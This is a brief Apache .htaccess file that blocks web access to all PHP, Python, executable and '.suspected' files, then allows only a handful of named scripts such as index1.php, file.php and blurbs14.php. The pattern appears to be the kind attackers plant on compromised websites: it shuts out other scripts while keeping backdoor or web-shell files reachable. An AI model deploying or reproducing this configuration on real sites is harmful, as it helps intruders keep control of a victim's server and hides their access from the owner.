<FilesMatch ".(py|exe|phtml|php|PhP|php5|suspected)$">
Order Allow,Deny
Deny from all
</FilesMatch>
<FilesMatch "(^style.php|^index1.php|^file.php|^blurbs14.php|^index.php|^www)$">
Order allow,deny
Allow from all
</FilesMatch>
